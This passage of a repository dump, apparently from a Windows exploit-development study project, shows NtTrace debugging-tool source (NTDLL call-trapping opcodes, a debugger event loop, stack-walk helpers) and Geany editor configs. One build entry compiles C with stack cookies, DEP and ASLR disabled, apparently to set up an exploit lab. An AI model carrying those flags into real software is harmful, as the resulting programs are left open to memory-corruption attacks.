& ); 135 | SymbolEngine& operator=( SymbolEngine const & ); 136 | 137 | bool showLines; // true to show lines 138 | bool showParams; // true to show parameters 139 | bool showVariables; // true to show variables 140 | int maxStackDepth; // max stack depth to show, -1 for all 141 | int skipCount; // stack frames to skip 142 | int maxSehDepth; // max SEH stack depth to show 143 | 144 | struct Impl; 145 | Impl *pImpl; 146 | }; 147 | 148 | } 149 | 150 | #endif // OR2_SYMBOLENGINE_H 151 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/TrapNtOpcodes.h: -------------------------------------------------------------------------------- 1 | #ifndef TRAPNTOPCODES_H_ 2 | #define TRAPNTOPCODES_H_ 3 | 4 | /**@file 5 | 6 | List of opcodes used by NtTrace to trap calls in NTDLL. 7 | 8 | @author Roger Orr 9 | 10 | Copyright © 2002,2003. 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | 24 | $Revision: 1405 $ 25 | */ 26 | 27 | // $Id: TrapNtOpcodes.h 1405 2013-11-12 23:57:17Z Roger $ 28 | 29 | // Define the op codes used for NtTrace 30 | static unsigned char const XOR = 0x33; ///< xor reg1,reg2 31 | static unsigned char const AddEsp = 0x83; ///< add esp,04h 32 | static unsigned char const MOVreg = 0x8B; ///< mov reg1,reg2 33 | static unsigned char const LEA = 0x8D; ///< lea reg1,operand 34 | static unsigned char const NOP = 0x90; ///< nop 35 | static unsigned char const MOVdwordEax = 0xB8; ///< mov eax,dword 36 | static unsigned char const MOVdwordEcx = 0xB9; ///< mov ecx,dword 37 | static unsigned char const MOVdwordEdx = 0xBA; ///< mov edx,dword 38 | static unsigned char const CallReg = 0xff; ///< call edx 39 | static unsigned char const RETn = 0xC2; ///< ret n 40 | static unsigned char const RET = 0xC3; ///< ret 41 | static unsigned char const BRKPT = 0xCC; ///< breakpoint 42 | static unsigned char const INTn = 0xCD; ///< interrupt 43 | static unsigned char const JMP = 0xE9; ///< far jump 44 | static unsigned char const FS = 0x64; ///< fs: 45 | 46 | #endif // TRAPNTOPCODES_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/buildVersion.h: -------------------------------------------------------------------------------- 1 | #define BUILD_VERSION 42 2 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/displayError.h: -------------------------------------------------------------------------------- 1 | #ifndef DISPLAY_ERROR_H_ 2 | #define DISPLAY_ERROR_H_ 3 | 4 | /** 5 | @file 6 | Function for displaying Win32 error to a stream. 7 | 8 | EXAMPLE
 9 |     displayError( std::cerr, GetLastError() );
10 |
11 | 12 | @author Roger Orr 13 | 14 | Copyright © 2004. 15 | This software is distributed in the hope that it will be useful, but 16 | without WITHOUT ANY WARRANTY; without even the implied warranty of 17 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 18 | 19 | Permission is granted to anyone to make or distribute verbatim 20 | copies of this software provided that the copyright notice and 21 | this permission notice are preserved, and that the distributor 22 | grants the recipient permission for further distribution as permitted 23 | by this notice. 24 | 25 | Comments and suggestions are always welcome. 26 | Please report bugs to rogero@howzatt.demon.co.uk. 27 | 28 | $Revision: 1405 $ 29 | */ 30 | 31 | // $Id: displayError.h 1405 2013-11-12 23:57:17Z Roger $ 32 | 33 | #include 34 | #include 35 | 36 | namespace or2 37 | { 38 | 39 | #pragma warning(push) 40 | #pragma warning(disable: 4512) // assignment operator could not be generated 41 | 42 | /** manipulator */ 43 | class displayError { 44 | public: 45 | /** Default ctor wraps GetLastError() */ 46 | displayError(); 47 | 48 | /** 49 | * Construct from an hresult 50 | * @param hresult the error code to display 51 | */ 52 | displayError(HRESULT hresult); 53 | 54 | /** 55 | * Print the error 56 | * @param os the output stream to write to 57 | */ 58 | void printOn(std::ostream &os) const; 59 | private: 60 | HRESULT const hresult; 61 | }; 62 | 63 | #pragma warning(pop) 64 | 65 | /** Stream a displayError manipulator */ 66 | std::ostream & operator<<(std::ostream & os, displayError const &se); 67 | 68 | } 69 | 70 | #include "displayError.inl" 71 | 72 | #endif // DISPLAY_ERROR_H_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/include/displayError.inl: -------------------------------------------------------------------------------- 1 | #ifndef DISPLAY_ERROR_INL_ 2 | #define DISPLAY_ERROR_INL_ 3 | 4 | #include 5 | #include 6 | 7 | namespace or2 8 | { 9 | 10 | /** 11 | Implementation of function for displaying Win32 error to a stream. 12 | 13 | EXAMPLE
 14 |     displayError( std::cerr, GetLastError() );
 15 |
16 | 17 | @author Roger Orr 18 | 19 | Copyright © 2004. 20 | This software is distributed in the hope that it will be useful, but 21 | without WITHOUT ANY WARRANTY; without even the implied warranty of 22 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 23 | 24 | Permission is granted to anyone to make or distribute verbatim 25 | copies of this software provided that the copyright notice and 26 | this permission notice are preserved, and that the distributor 27 | grants the recipient permission for further distribution as permitted 28 | by this notice. 29 | 30 | Comments and suggestions are always welcome. 31 | Please report bugs to rogero@howzatt.demon.co.uk. 32 | 33 | $Revision: 1405 $ 34 | */ 35 | 36 | // $Id: displayError.inl 1405 2013-11-12 23:57:17Z Roger $ 37 | 38 | inline 39 | displayError::displayError() 40 | : hresult(GetLastError()) 41 | {} 42 | 43 | inline 44 | displayError::displayError(HRESULT hresult) 45 | : hresult(hresult) 46 | {} 47 | 48 | inline 49 | void displayError::printOn(std::ostream &os) const 50 | { 51 | if ( hresult == 0 ) 52 | { 53 | os << "no error"; 54 | return; 55 | } 56 | 57 | LPTSTR pszMsg = 0; 58 | 59 | FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER|FORMAT_MESSAGE_FROM_SYSTEM|FORMAT_MESSAGE_IGNORE_INSERTS, 60 | 0, 61 | hresult, 62 | MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), 63 | (LPTSTR)&pszMsg, 64 | 0, 65 | NULL ); 66 | if ( pszMsg != 0 ) 67 | { 68 | size_t nLen = strlen(pszMsg); 69 | if (nLen > 1 && pszMsg[nLen - 1] == '\n') { 70 | pszMsg[--nLen] = 0; 71 | if (nLen > 1 && pszMsg[nLen - 1] == '\r') { 72 | pszMsg[--nLen] = 0; 73 | } 74 | if (nLen > 1 && pszMsg[nLen - 1] == '.') { 75 | pszMsg[--nLen] = 0; 76 | } 77 | } 78 | 79 | if ( hresult < 0 ) 80 | os << std::hex; 81 | os << "error " << hresult << std::dec << " (" << pszMsg << ")"; 82 | ::LocalFree( pszMsg ); 83 | } 84 | else 85 | { 86 | if ( hresult < 0 ) 87 | os << std::hex; 88 | os << "Win32 error: " << hresult << std::dec; 89 | } 90 | } 91 | 92 | /* Stream a displayError manipulator */ 93 | inline 94 | std::ostream & operator<<(std::ostream & os, displayError const &se) 95 | { 96 | se.printOn(os); 97 | return os; 98 | } 99 | 100 | } // namespace 101 | 102 | #endif // DISPLAY_ERROR_INL_ -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/log.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/NtTrace-x86/NtTrace/log.txt -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/src/DebugDriver.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | NAME 3 | DebugDriver.cpp 4 | 5 | DESCRIPTION 6 | Implementation of the debug driver code 7 | 8 | COPYRIGHT 9 | Copyright (C) 2002,2003 by Roger Orr 10 | 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | */ 24 | 25 | #pragma warning( disable: 4786 ) // identifier was truncated to '255' characters 26 | 27 | #include "DebugDriver.h" 28 | 29 | #include 30 | 31 | #include "displayError.h" 32 | 33 | static char const szRCSID[] = "$Id: DebugDriver.cpp 1405 2013-11-12 23:57:17Z Roger $"; 34 | 35 | ////////////////////////////////////////////////////////////////////////// 36 | // Main debugger loop 37 | void or2::DebugDriver::Loop( Debugger & debugger ) 38 | { 39 | ULONG timeout = INFINITE; 40 | DEBUG_EVENT DebugEvent; 41 | 42 | while ( WaitForDebugEvent( 43 | &DebugEvent, // debug event information 44 | timeout // time-out value 45 | ) && debugger.Active() ) 46 | { 47 | DWORD continueFlag = DBG_CONTINUE; 48 | switch ( DebugEvent.dwDebugEventCode ) 49 | { 50 | case EXCEPTION_DEBUG_EVENT: 51 | { 52 | ProcessEntry & pe = processMap[ DebugEvent.dwProcessId ]; 53 | ThreadMap & tm = pe.threadMap; 54 | HANDLE hThread = tm[ DebugEvent.dwThreadId ]; 55 | 56 | // The first breakpoint is called by attaching to the process. 57 | if ( ! pe.attached && 58 | ( DebugEvent.u.Exception.ExceptionRecord.ExceptionCode == STATUS_BREAKPOINT ) ) 59 | { 60 | pe.attached = true; 61 | } 62 | else 63 | { 64 | continueFlag = DBG_EXCEPTION_NOT_HANDLED; 65 | } 66 | 67 | debugger.OnException( pe.hProcess, hThread, DebugEvent.dwProcessId, DebugEvent.dwThreadId, DebugEvent.u.Exception, &continueFlag ); 68 | } 69 | break; 70 | 71 | case CREATE_THREAD_DEBUG_EVENT: 72 | { 73 | ProcessEntry & processEntry = processMap[ DebugEvent.dwProcessId ]; 74 | processEntry.threadMap[ DebugEvent.dwThreadId ] = DebugEvent.u.CreateThread.hThread; 75 | 76 | debugger.OnCreateThread( DebugEvent.dwThreadId, DebugEvent.u.CreateThread ); 77 | } 78 | break; 79 | 80 | case CREATE_PROCESS_DEBUG_EVENT: 81 | { 82 | ProcessEntry pe; 83 | pe.hProcess = DebugEvent.u.CreateProcessInfo.hProcess; 84 | pe.threadMap[ DebugEvent.dwThreadId ] = DebugEvent.u.CreateProcessInfo.hThread; 85 | processMap[ DebugEvent.dwProcessId ] = pe; 86 | 87 | debugger.OnCreateProcess( DebugEvent.dwProcessId, DebugEvent.dwThreadId, DebugEvent.u.CreateProcessInfo ); 88 | 89 | // Close unwanted handle (following John Robbins) 90 | if ( ( DebugEvent.u.CreateProcessInfo.hFile != 0 ) && 91 | ( ! CloseHandle( DebugEvent.u.CreateProcessInfo.hFile ) ) ) 92 | { 93 | std::cerr << "Unable to close process file handle: " << displayError() << std::endl; 94 | } 95 | 96 | break; 97 | } 98 | 99 | case EXIT_THREAD_DEBUG_EVENT: 100 | { 101 | ThreadMap & threadMap = processMap[ DebugEvent.dwProcessId ].threadMap; 102 | 103 | debugger.OnExitThread( DebugEvent.dwThreadId, DebugEvent.u.ExitThread ); 104 | 105 | threadMap.erase( DebugEvent.dwThreadId ); 106 | 107 | } 108 | break; 109 | 110 | case EXIT_PROCESS_DEBUG_EVENT: 111 | { 112 | debugger.OnExitProcess( DebugEvent.dwProcessId, DebugEvent.u.ExitProcess ); 113 | 114 | processMap.erase( DebugEvent.dwProcessId ); 115 | if ( processMap.empty() ) 116 | { 117 | timeout = 1; // Nothing left to live for :-) 118 | } 119 | 120 | break; 121 | } 122 | 123 | case LOAD_DLL_DEBUG_EVENT: 124 | { 125 | HANDLE hProcess = processMap[ DebugEvent.dwProcessId ].hProcess; 126 | 127 | debugger.OnLoadDll( hProcess, DebugEvent.u.LoadDll ); 128 | 129 | // Close unwanted handle (following John Robbins) 130 | if ( ( DebugEvent.u.LoadDll.hFile != 0 ) && 131 | ( ! CloseHandle( DebugEvent.u.LoadDll.hFile ) ) ) 132 | { 133 | std::cerr << "Unable to close dll file handle: " << displayError() << std::endl; 134 | } 135 | } 136 | break; 137 | 138 | case UNLOAD_DLL_DEBUG_EVENT: 139 | debugger.OnUnloadDll( DebugEvent.u.UnloadDll ); 140 | break; 141 | 142 | case OUTPUT_DEBUG_STRING_EVENT: 143 | { 144 | HANDLE hProcess = processMap[ DebugEvent.dwProcessId ].hProcess; 145 | 146 | debugger.OnOutputDebugString( hProcess, DebugEvent.u.DebugString ); 147 | } 148 | break; 149 | 150 | default: 151 | std::cerr << "Got unexpected debug event " << DebugEvent.dwDebugEventCode << std::endl; 152 | break; 153 | } 154 | 155 | if ( ! ContinueDebugEvent( DebugEvent.dwProcessId, DebugEvent.dwThreadId, continueFlag ) ) 156 | { 157 | std::cerr << "Error " << displayError() << " continuing debug event" << std::endl; 158 | } 159 | } 160 | } 161 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/src/GetFileNameFromHandle.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/NtTrace-x86/NtTrace/src/GetFileNameFromHandle.cpp -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/src/GetModuleBase.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | NAME 3 | GetModuleBase.cpp 4 | 5 | DESCRIPTION 6 | Helper for stack walking. 7 | 8 | COPYRIGHT 9 | Copyright (C) 2003 by Roger Orr 10 | 11 | This software is distributed in the hope that it will be useful, but 12 | without WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 14 | 15 | Permission is granted to anyone to make or distribute verbatim 16 | copies of this software provided that the copyright notice and 17 | this permission notice are preserved, and that the distributor 18 | grants the recipient permission for further distribution as permitted 19 | by this notice. 20 | 21 | Comments and suggestions are always welcome. 22 | Please report bugs to rogero@howzatt.demon.co.uk. 23 | */ 24 | 25 | #include "GetModuleBase.h" 26 | 27 | #include 28 | #include 29 | #include // GetModuleFileNameEx 30 | #include 31 | #include 32 | 33 | #pragma comment( lib, "psapi" ) 34 | 35 | static char const szRCSID[] = "$Id: GetModuleBase.cpp 1405 2013-11-12 23:57:17Z Roger $"; 36 | 37 | namespace 38 | { 39 | ////////////////////////////////////////////////////////// 40 | // fix for problem with resource leak in symsrv 41 | void fixSymSrv() 42 | { 43 | static bool loaded = false; 44 | if ( !loaded ) 45 | { 46 | HMODULE const hSymSrv = ::GetModuleHandle( "SymSrv" ); 47 | if ( hSymSrv != 0 ) 48 | { 49 | ::LoadLibrary( "SymSrv" ); 50 | loaded = true; 51 | } 52 | } 53 | } 54 | } 55 | 56 | ///////////////////////////////////////////////////////////////////////////////////// 57 | /// GetModuleBase: try to get information about a module being loaded 58 | /// 59 | /// This function is called by the stack walker to load symbols for a new address. 60 | /// NOTES: 61 | /// This function is needed because we are using FALSE for the last parameter of 62 | /// SymInitialize(), which prevents ALL modules being automatically loaded and so 63 | /// dramatically improves the speed of the stack walk 64 | /// We check whether the address is valid first because some invalid addresses 65 | /// cause access violations inside DbgHelp.dll 66 | /// 67 | DWORD64 CALLBACK GetModuleBase( HANDLE hProcess, DWORD64 dwAddress ) 68 | { 69 | DWORD64 baseAddress = 0; 70 | 71 | MEMORY_BASIC_INFORMATION mbInfo; 72 | if ( ::VirtualQueryEx( hProcess, (PVOID)dwAddress, &mbInfo, sizeof( mbInfo ) ) && 73 | ( ( mbInfo.State & MEM_FREE ) == 0 ) ) 74 | { 75 | // It is already in the symbol engine? 76 | IMAGEHLP_MODULE64 stIHM = { sizeof ( IMAGEHLP_MODULE64 ) }; 77 | 78 | if ( ::SymGetModuleInfo64( hProcess, dwAddress, &stIHM ) ) 79 | { 80 | baseAddress = stIHM.BaseOfImage; 81 | //ATLTRACE("showGetModuleBase got addr from SymGetModuleInfo = %x\n", baseAddress); 82 | } 83 | else 84 | { 85 | baseAddress = (DWORD64)mbInfo.AllocationBase; 86 | HMODULE const hmod = (HMODULE)mbInfo.AllocationBase; 87 | 88 | char szFileName[ MAX_PATH ] = ""; 89 | DWORD const dwNameLen = GetModuleFileNameWrapper( hProcess, hmod, szFileName, sizeof szFileName/sizeof szFileName[0] ); 90 | 91 | if ( 0 != dwNameLen ) 92 | { 93 | bool bPathSet( false ); 94 | std::vector searchpath( 1024 ); 95 | if ( ::SymGetSearchPath( hProcess, &searchpath[0], 1024 ) ) 96 | { 97 | // symbol files often stored with binary image 98 | char const * delim = strrchr( szFileName, '\\' ); 99 | if ( delim ) 100 | { 101 | std::string fullpath( szFileName, delim - szFileName ); 102 | fullpath += ";"; 103 | fullpath += &searchpath[0]; 104 | ::SymSetSearchPath( hProcess, const_cast(fullpath.c_str()) ); // Some versions of DbgHelp.h not const-correct 105 | bPathSet = true; 106 | } 107 | } 108 | // We do not need to pass a file handle - trapNtCalls reveals that DbgHelp simply opens the file 109 | // if we don't provide a handle or duplicates the handle if we do. 110 | if (!::SymLoadModule64( hProcess, NULL, szFileName, NULL, baseAddress, 0 )) 111 | { 112 | //ATLTRACE("SymLoadModule, failed for %s\n", szFileName); 113 | } 114 | fixSymSrv(); 115 | if ( bPathSet ) 116 | { 117 | ::SymSetSearchPath( hProcess, const_cast(&searchpath[0]) ); 118 | } 119 | } 120 | else 121 | { 122 | //ATLTRACE("Module not found at %X\n", baseAddress); 123 | } 124 | 125 | //ATLTRACE("GetModuleBase got addr from VirtualQueryEx = %x\n", baseAddress); 126 | } 127 | } 128 | 129 | return baseAddress; 130 | } 131 | 132 | /** 133 | * Get module file name, correcting for a couple of common issues. 134 | * 135 | * @param hProcess the process to query 136 | * @param hMod the module to query 137 | * @param szBuff the output filename buffer 138 | * @param bufLen the size of the output buffer 139 | * @returns the length of the string copied to the buffer, or zero on failure, 140 | * in which case call GetLastError for the underlying error code. 141 | */ 142 | DWORD GetModuleFileNameWrapper( HANDLE hProcess, HMODULE hMod, char * szBuff, DWORD bufLen ) 143 | { 144 | DWORD ret = ::GetModuleFileNameEx( hProcess, hMod, szBuff, bufLen ); 145 | if (ret == 0 && hMod == 0) 146 | { 147 | DWORD lastError = GetLastError(); 148 | if (lastError == ERROR_PARTIAL_COPY || lastError == ERROR_INVALID_HANDLE) 149 | { 150 | // Use alternate API to get exe name in 64-bit windows. 151 | typedef BOOL (WINAPI *pfnQueryFullProcessImageName)( 152 | /*__in*/ HANDLE hProcess, 153 | /*__in*/ DWORD dwFlags, 154 | /*__out*/ LPCSTR lpExeName, 155 | /*__inout*/ PDWORD lpdwSize 156 | ); 157 | 158 | static pfnQueryFullProcessImageName pQueryFullProcessImageName = (pfnQueryFullProcessImageName)GetProcAddress(GetModuleHandle("KERNEL32"), "QueryFullProcessImageNameA"); 159 | 160 | if (pQueryFullProcessImageName && pQueryFullProcessImageName(hProcess, 0, szBuff, &bufLen)) 161 | { 162 | ret = bufLen; 163 | } 164 | else 165 | { 166 | // Windows 2003 only has this one: which returns paths in device form 167 | typedef DWORD (WINAPI *pfnGetProcessImageFileName)( 168 | IN HANDLE hProcess, 169 | OUT LPTSTR lpImageFileName, 170 | IN DWORD nSize 171 | ); 172 | 173 | static pfnGetProcessImageFileName pGetProcessImageFileName = (pfnGetProcessImageFileName)GetProcAddress(GetModuleHandle("psapi"), "GetProcessImageFileNameA"); 174 | if (pGetProcessImageFileName) 175 | { 176 | ret = pGetProcessImageFileName(hProcess, szBuff, bufLen); 177 | } 178 | } 179 | } 180 | if (ret == 0) 181 | { 182 | SetLastError(lastError); 183 | } 184 | } 185 | if ( ret != 0 ) 186 | { 187 | if ( memcmp( szBuff, "\\??\\", 4 ) == 0 ) 188 | { 189 | szBuff[1] = '\\'; // For some reason the wrong UNC header is returned 190 | } 191 | } 192 | return ret; 193 | } 194 | -------------------------------------------------------------------------------- /11_tools/NtTrace-x86/NtTrace/version.rc: -------------------------------------------------------------------------------- 1 | // Resource file for include for project binaries 2 | // 3 | // $Id: version.rc 613 2010-03-09 23:59:36Z Roger $ 4 | 5 | #include "winver.h" 6 | 7 | // Common values for the product suite 8 | #define MAJOR_VERSION 2 9 | #include "buildVersion.h" 10 | 11 | 12 | #ifndef MINOR_VERSION 13 | #error MINOR_VERSION must be defined. 14 | #endif 15 | 16 | #define STR(X) #X 17 | #define TO_STR(X) STR(X) 18 | 19 | #define VERSION MAJOR_VERSION,1,MINOR_VERSION,BUILD_VERSION 20 | #define VERSION_STRING TO_STR(MAJOR_VERSION) ".1." TO_STR(MINOR_VERSION) "." TO_STR(BUILD_VERSION) 21 | 22 | VS_VERSION_INFO VERSIONINFO 23 | FILEVERSION VERSION 24 | PRODUCTVERSION VERSION 25 | FILEFLAGSMASK 0x3fL 26 | FILEFLAGS 0x0L 27 | FILEOS VOS_NT_WINDOWS32 28 | #if defined(APPLICATION) 29 | FILETYPE VFT_APP 30 | #elif defined(LIBRARY) 31 | FILETYPE VFT_DLL 32 | #else 33 | #error APPLICATION or LIBRARY must be defined. 34 | #endif 35 | FILESUBTYPE VFT2_UNKNOWN 36 | BEGIN 37 | BLOCK "StringFileInfo" 38 | BEGIN 39 | BLOCK "080904B0" 40 | BEGIN 41 | VALUE "CompanyName", "OR/2 Limited" 42 | VALUE "FileDescription", DESCRIPTION 43 | VALUE "FileVersion", VERSION_STRING 44 | VALUE "LegalCopyright", "Copyright (C) OR/2 Limited 2010" 45 | VALUE "ProductName", "Debugging Tools" 46 | END 47 | END 48 | BLOCK "VarFileInfo" 49 | BEGIN 50 | // UK English, Unicode 51 | VALUE "Translation", 0x809, 1200 52 | END 53 | END 54 | -------------------------------------------------------------------------------- /11_tools/PEフォーマット_nx_aslr有無の違い.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/PEフォーマット_nx_aslr有無の違い.JPG -------------------------------------------------------------------------------- /11_tools/geany(appdata_roaming)/filedefs/filetypes.README: -------------------------------------------------------------------------------- 1 | Copy files from C:\Program Files (x86)\Geany\data to this directory to overwrite them. To use the defaults, just delete the file in this directory. 2 | For more information read the documentation (in C:\Program Files (x86)\Geany\doc\index.html or visit http://www.geany.org/). -------------------------------------------------------------------------------- /11_tools/geany(appdata_roaming)/filedefs/filetypes.c: -------------------------------------------------------------------------------- 1 | 2 | [build-menu] 3 | FT_00_LB=コンパイル・リンク 4 | FT_00_CM=cl /Od /GS- %f /link /nxcompat /dynamicbase 5 | FT_00_WD= 6 | EX_01_LB=デバッグ実行 7 | EX_01_CM=windbg %e.exe 8 | EX_01_WD= 9 | EX_00_LB=実行 10 | EX_00_CM=%e.exe 11 | EX_00_WD= 12 | FT_01_LB=コンパイル・リンク(DEP・ASLR無効) 13 | FT_01_CM=cl /Od /GS- /Zi %f /link /nxcompat:no /dynamicbase:no 14 | FT_01_WD= 15 | FT_02_LB=コンパイル 16 | FT_02_CM=cl /c /Zi /Od /GS- %f 17 | FT_02_WD= 18 | -------------------------------------------------------------------------------- /11_tools/geany(appdata_roaming)/filedefs/filetypes.common: -------------------------------------------------------------------------------- 1 | 2 | [build-menu] 3 | FT_00_LB=アセンブル 4 | FT_00_CM=nasm %f 5 | FT_00_WD= 6 | FT_01_LB=逆アセンブル 7 | FT_01_CM=ndisasm -b32 %e 8 | FT_01_WD= 9 | -------------------------------------------------------------------------------- /11_tools/geany(appdata_roaming)/filedefs/filetypes.python: -------------------------------------------------------------------------------- 1 | 2 | [build-menu] 3 | EX_00_LB=実行 4 | EX_00_CM=python "%f" 5 | EX_00_WD= 6 | -------------------------------------------------------------------------------- /11_tools/geany(appdata_roaming)/geany.conf: -------------------------------------------------------------------------------- 1 | 2 | [geany] 3 | default_open_path= 4 | cmdline_new_files=true 5 | notebook_double_click_hides_widgets=false 6 | tab_pos_sidebar=2 7 | sidebar_pos=0 8 | highlighting_invert_all=false 9 | pref_main_suppress_search_dialogs=false 10 | pref_main_search_use_current_word=true 11 | check_detect_indent=false 12 | use_tab_to_indent=true 13 | pref_editor_tab_width=4 14 | indent_mode=2 15 | indent_type=1 16 | virtualspace=1 17 | autocomplete_doc_words=false 18 | completion_drops_rest_of_word=false 19 | autocompletion_max_entries=30 20 | color_scheme= 21 | mru_length=10 22 | disk_check_timeout=30 23 | show_editor_scrollbars=true 24 | brace_match_ltgt=false 25 | use_gtk_word_boundaries=true 26 | complete_snippets_whilst_editing=false 27 | use_safe_file_saving=false 28 | gio_unsafe_save_backup=false 29 | indent_hard_tab_width=8 30 | find_selection_type=0 31 | show_symbol_list_expanders=true 32 | compiler_tab_autoscroll=true 33 | allow_always_save=false 34 | statusbar_template= 35 | new_document_after_close=false 36 | documents_show_paths=true 37 | sidebar_page=0 38 | pref_main_load_session=false 39 | pref_main_project_session=true 40 | pref_main_project_file_in_basedir=false 41 | pref_main_save_winpos=true 42 | pref_main_confirm_exit=false 43 | pref_main_suppress_status_messages=false 44 | switch_msgwin_pages=false 45 | beep_on_errors=true 46 | auto_focus=false 47 | sidebar_symbol_visible=true 48 | sidebar_openfiles_visible=true 49 | editor_font=Monospace 10 50 | tagbar_font=Sans 9 51 | msgwin_font=Sans 9 52 | show_notebook_tabs=true 53 | show_tab_cross=true 54 | tab_order_ltr=true 55 | tab_order_beside=false 56 | tab_pos_editor=2 57 | tab_pos_msgwin=0 58 | msgwin_status_visible=true 59 | msgwin_compiler_visible=true 60 | msgwin_messages_visible=true 61 | msgwin_scribble_visible=true 62 | use_native_windows_dialogs=false 63 | show_indent_guide=false 64 | show_white_space=false 65 | show_line_endings=false 66 | show_markers_margin=true 67 | show_linenumber_margin=true 68 | long_line_enabled=true 69 | long_line_type=0 70 | long_line_column=72 71 | long_line_color=#C2EBC2 72 | symbolcompletion_max_height=10 73 | symbolcompletion_min_chars=4 74 | use_folding=true 75 | unfold_all_children=false 76 | use_indicators=true 77 | line_wrapping=false 78 | auto_close_xml_tags=true 79 | complete_snippets=true 80 | auto_complete_symbols=true 81 | pref_editor_disable_dnd=false 82 | pref_editor_smart_home_key=true 83 | pref_editor_newline_strip=false 84 | line_break_column=72 85 | auto_continue_multiline=true 86 | comment_toggle_mark=~ 87 | scroll_stop_at_last_line=true 88 | autoclose_chars=0 89 | pref_editor_default_new_encoding=SHIFT_JIS 90 | pref_editor_default_open_encoding=None 91 | default_eol_character=0 92 | pref_editor_new_line=true 93 | pref_editor_ensure_convert_line_endings=false 94 | pref_editor_replace_tabs=false 95 | pref_editor_trail_space=false 96 | pref_toolbar_show=true 97 | pref_toolbar_append_to_menu=false 98 | pref_toolbar_use_gtk_default_style=true 99 | pref_toolbar_use_gtk_default_icon=true 100 | pref_toolbar_icon_style=0 101 | pref_toolbar_icon_size=0 102 | pref_template_developer=Hideaki 103 | pref_template_company= 104 | pref_template_mail=Hideaki@HIDEAKI-PC 105 | pref_template_initial=H 106 | pref_template_version=1.0 107 | pref_template_year=%Y 108 | pref_template_date=%Y-%m-%d 109 | pref_template_datetime=%d.%m.%Y %H:%M:%S %Z 110 | context_action_cmd= 111 | sidebar_visible=true 112 | statusbar_visible=true 113 | msgwindow_visible=true 114 | fullscreen=false 115 | scribble_text=メモとして、ここには自由に入力できます。 116 | scribble_pos=20 117 | treeview_position=298 118 | msgwindow_position=437 119 | geometry=-8;-8;1366;716;1; 120 | custom_date_format= 121 | tab_close_switch_to_mru=false 122 | msgwin_orientation=1 123 | detect_indent_width=false 124 | autocompletion_update_freq=250 125 | use_atomic_file_saving=false 126 | use_gio_unsafe_file_saving=true 127 | keep_edit_history_on_reload=true 128 | show_keep_edit_history_on_reload_msg=false 129 | extract_filetype_regex=-\\*-\\s*([^\\s]+)\\s*-\\*- 130 | replace_and_find_by_default=true 131 | 132 | [search] 133 | pref_search_current_file_dir=true 134 | find_all_expanded=false 135 | replace_all_expanded=false 136 | position_find_x=608 137 | position_find_y=407 138 | position_replace_x=-1 139 | position_replace_y=-1 140 | position_fif_x=-1 141 | position_fif_y=-1 142 | fif_regexp=false 143 | fif_case_sensitive=true 144 | fif_match_whole_word=false 145 | fif_invert_results=false 146 | fif_recursive=false 147 | fif_extra_options= 148 | fif_use_extra_options=false 149 | fif_files= 150 | fif_use_files=false 151 | pref_search_hide_find_dialog=false 152 | pref_search_always_wrap=false 153 | fif_files_mode=0 154 | find_regexp=true 155 | find_regexp_multiline=false 156 | find_case_sensitive=false 157 | find_escape_sequences=false 158 | find_match_whole_word=false 159 | find_match_word_start=false 160 | find_close_dialog=true 161 | replace_regexp=false 162 | replace_regexp_multiline=false 163 | replace_case_sensitive=false 164 | replace_escape_sequences=false 165 | replace_match_whole_word=false 166 | replace_match_word_start=false 167 | replace_search_backwards=false 168 | replace_close_dialog=true 169 | 170 | [plugins] 171 | load_plugins=true 172 | custom_plugin_path= 173 | active_plugins=; 174 | 175 | [tools] 176 | term_cmd=cmd.exe 177 | browser_cmd=firefox 178 | grep_cmd=grep 179 | terminal_cmd=cmd.exe /Q /C %c 180 | 181 | [printing] 182 | print_cmd=' 183 | use_gtk_printing=true 184 | print_line_numbers=true 185 | print_page_numbers=true 186 | print_page_header=true 187 | page_header_basename=false 188 | page_header_datefmt=%c 189 | 190 | [project] 191 | session_file= 192 | project_file_path=C:\\Users\\Hideaki\\プロジェクト 193 | 194 | [files] 195 | 